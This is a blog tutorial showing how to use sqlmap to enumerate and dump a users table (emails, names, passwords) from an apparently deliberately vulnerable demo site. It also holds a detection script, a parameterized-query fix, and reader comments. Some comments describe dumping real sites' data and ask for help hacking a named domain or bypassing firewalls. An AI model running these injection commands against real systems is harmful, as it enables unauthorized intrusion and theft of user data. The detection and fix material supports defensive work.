Monday, March 31, 2014

Hacking Website with Sqlmap in Kali Linux

A screenshot from the SQLmap official website
In the previous tutorial, we hacked a website using nothing but a simple browser on a Windows machine. It was a pretty clumsy method, to say the least. However, knowing the basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using Kali Linux (see the top navigation bar to find out how to install it if you haven't already) and sqlmap (which comes preinstalled in Kali) to automate what we did manually in the Manual SQL Injection tutorial to hack websites.




Now it is recommended that you go through the above tutorial once so that you can get an idea about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find out whether a website is vulnerable or not, as we already know from the previous tutorial that this website is vulnerable.

Kali Linux

First off, you need to have Kali Linux (or BackTrack) up and running on your machine. Any other Linux distro might work, but you'll need to install sqlmap on your own. If you don't have Kali Linux installed, you might want to go to this page, which will get you started on Beginner Hacking Using Kali Linux.

Sqlmap


Basically, it's just a tool to make SQL injection easier. Their official website introduces the tool as - "sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections."
A lot of features can be found on the sqlmap website, the most important being - "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems." That's basically all the database management systems. Most of the time you'll never come across anything other than MySQL.

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali Linux machine. Start a terminal, and type -
sqlmap -h
It lists the basic commands that are supported by sqlmap. To start with, we'll execute a simple command
sqlmap -u "<URL to inject>". In our case, it will be -
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
Sometimes, using the --time-sec option helps to speed up the process, especially when the server responses are slow.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --time-sec 15
Either way, when sqlmap is done, it will tell you the MySQL version and some other useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap may sometimes ask you questions which have to be answered with yes/no. Typing y means yes and n means no. Here are a few typical questions you might come across -
  • Some message saying that the database is probably MySQL, so should sqlmap skip all other tests and conduct MySQL tests only. Your answer should be yes (y).
  • Some message asking you whether or not to use the payloads for specific versions of MySQL. The answer depends on the situation. If you are unsure, then it's usually better to say yes.

Enumeration

Database

In this step, we will obtain the database name, column names and other useful data from the database.
List of a few common enumeration commands
So first we will get the names of the available databases. For this we will add --dbs to our previous command. The final result will look like -
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
So the two databases are acuart and information_schema.
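Seen from the web server's side, the steps above leave recognizable traces in the access log. The following detection sketch is an added example, not part of the original tutorial; the log lines are constructed, and the rule names and patterns are assumptions chosen to match the requests this tutorial generates (the sqlmap User-Agent, boolean probes, information_schema enumeration and time delays).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = r'''
203.0.113.7 - - [31/Mar/2014:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 7880 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [31/Mar/2014:10:00:05 +0000] "GET /listproducts.php?cat=1%20AND%201%3D1 HTTP/1.1" 200 7880 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [31/Mar/2014:10:00:09 +0000] "GET /listproducts.php?cat=1%20UNION%20ALL%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 912 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [31/Mar/2014:10:00:12 +0000] "GET /listproducts.php?cat=1%20AND%20SLEEP%2815%29 HTTP/1.1" 200 7880 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# ip, ident, user, [time], "METHOD target PROTO", status, size, "referer", "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Patterns applied to the URL-decoded value of every query parameter.
PARAM_RULES = {
    "boolean-probe": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),
    "schema-enumeration": re.compile(r"information_schema", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
}

def findings(line):
    """Return (ip, target, sorted rule names) for one log line, or None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    hits = set()
    # The User-Agent is client-controlled, so treat it as a hint, not as proof.
    if "sqlmap" in m["ua"].lower():
        hits.add("sqlmap-user-agent")
    for _, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        for name, rx in PARAM_RULES.items():
            if rx.search(value):
                hits.add(name)
    return m["ip"], m["target"], sorted(hits)

def scan(log_text):
    """Return findings for every line that triggered at least one rule."""
    results = [findings(l) for l in log_text.splitlines() if l.strip()]
    return [r for r in results if r and r[2]]

if __name__ == "__main__":
    for ip, target, hits in scan(SAMPLE_LOG):
        print(ip, hits, target)
```

The parameter rules carry the detection: they fire on the decoded value regardless of which client sent the request.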

Table

Now we are obviously interested in the acuart database. Information schema can be thought of as a default table which is present on all your targets, and contains information about the structure of databases, tables, etc., but not the kind of information we are looking for. It can, however, be useful on a number of occasions. So, now we will specify the database of interest using -D and tell sqlmap to list the tables using the --tables option. The final sqlmap command will be -
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables
The result should be something like this -
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns using --columns. I hope you guys are starting to get the pattern by now. The most appealing table here is users. It might contain the usernames and passwords of registered users on the website (hackers always look for sensitive data).
The final command must be something like -
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns
The result would resemble this-

Data

If you were following along attentively, you might expect that we will now be getting data from one of the columns. While that hypothesis is not completely wrong, it's time we go one step ahead. Now we will be getting data from multiple columns. As usual, we will specify the database with -D, the table with -T, and the columns with -C. We will get all data from the specified columns using --dump. We will enter multiple columns and separate them with commas. The final command will look like this.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C email,name,pass --dump
Here's the result
John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing great, but in real-world web pentesting, you can come across more sensitive data. Under such circumstances, the right thing to do is mail the admin of the website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind bars. That's it for this tutorial. Try to look at other columns and tables and see what you can dig up. Take a look at the previous tutorial on Manual SQL Injection which will help you find more interesting vulnerable sites.
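What "fix the vulnerability" means for a parameter like cat, as an added example that is not part of the original tutorial: the same lookup written with string concatenation, with a bound parameter, and with input validation plus binding. The in-memory SQLite schema, the sample rows and the function names are assumptions made for illustration; the real site's code is not shown on this page.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for a products table (schema and rows are assumed).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, cat INTEGER, name TEXT);
        INSERT INTO products (cat, name) VALUES (1, 'poster'), (1, 'print'), (2, 'frame');
    """)
    return db

def list_products_vulnerable(db, cat):
    # Injectable: the request value is pasted into the SQL text and parsed as SQL.
    sql = "SELECT name FROM products WHERE cat = " + cat + " ORDER BY id"
    return db.execute(sql).fetchall()

def list_products_bound(db, cat):
    # Bound parameter: the value is sent as data and can never change the query shape.
    sql = "SELECT name FROM products WHERE cat = ? ORDER BY id"
    return db.execute(sql, (cat,)).fetchall()

def list_products_validated(db, cat):
    # Defence in depth: reject anything that is not a short decimal id, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be a decimal integer")
    return list_products_bound(db, int(cat))

if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1=1"  # tautology: changes the WHERE clause when concatenated
    print("vulnerable:", list_products_vulnerable(db, probe))  # all three rows
    print("bound:     ", list_products_bound(db, probe))       # no rows
    try:
        list_products_validated(db, probe)
    except ValueError as exc:
        print("validated: rejected,", exc)
```

With the bound version in place, sqlmap reports the parameter as not injectable, because no input can alter the statement that the database parses.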

44 comments:

  1. hey saswat it seems you have moved to a new domain I don't see the blogspot in your url and it's .tk domain so can you let me know how to migrate to .tk domain...I want to move it there too

  2. nice articles...keep publishing...i will recommend your website in my youtube channel...i liked it very much

  3. good :) hack the planet *_*

  4. Can someone please revert the SQL data back to something other than Spanish profanities

    Thank you though :) Nice tutorial!!

    1. No longer like that... Now full of redirects to shady pr0n sites. Won't be demonstrating this one at school...

  5. see the real hacking of admin of a website using SQL map
    It's better to see than to read and do. so click on
    https://www.youtube.com/watch?v=72Gi1oDkHdM

  6. thanx bro teach more tutorial!........ i am waiting,,,

  7. Why don't you teach the users advanced levels of the Sql Map ? Anyways this was the simple and the best tutor i have ever seen Greets _ Alainhacker.CoM CreW !

  8. Do you want to tell us that "We should try to be WHITE HAT HACKER not BLACK HAT HACKER"

  9. --time-sec 15
    Could you please tell what this does? :)

  10. WoW!
    Very nice tutorial , i like this website.

  11. Hi any can make a video how to hack this website sopranonline.ddns.net ..

  12. Fantastic stuff. Ran a check on a couple of websites and managed to find their entire subscribers list. I know nothing too serious but messaged them to inform them of the issues with their SQL being injectable.

  13. if password is in this form 2384h2h2dfccd922fcs8oo2pv ?

  15. It's a hashed password. Crack it with online cracking sites like crackstation

  16. the user and password column is empty when i try to my website so please can you help me from that gab.

    thank you.

  17. Hello!

    I'm not looking to hack a site. I'm looking to test if my website's company is vulnerable.

    So, I'm a little lost 'cause I can't find which commands to use.

    Probably my website's company are secure, but for compliance issues, I have to execute a sql injection test in order to report if the website is secure or not.

    Where can I begin?

    1. Kali Linux official website, look at pentesting

  18. What i do if a website does not have any sql vulnerability. I want hack a website without a sqlmap. I have tried it but does not worked

    1. =>If Website is not Vulnerable to Sql Injections,Try This

      https://www.owasp.org/index.php/Blind_SQL_Injection

  19. =>Excellent job !Works Complete successfully
    =>Thanks BRO

  20. Nice tutorial. Hacking with kali is more advanced than any other like sql injection..etc
    A new version of kali is now available,better try it !!

  21. Cool job you're doing in here bro 9ice tutorials i invited you to chat on google hangout. Thanks

  23. when i tried sqlmap -u http://www.target.com. --time-sec 15 command against i got this warning GET parameter 'ID' is not injectable.

    1. That is because target.com is not vulnerable to an SQL injection. the url needs to have .php?= or something close to that

  25. Does anyone know how to bypass firewall of a website and then hack it?? Like the websites that have WAF or IPS/

  26. I did what you just instructed and I am able to get the admin access. However, I have a question, how I will get the complete database? and how I will be able to extract on my computer?

  27. Did we can use this attack on .org sites

  28. Nice tutorial. I've found another tutorial that uses advance switches. You can check them at https://edricteo.com/sqlmap-commands/

  30. it shows host does not exist...what to do now ?


© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.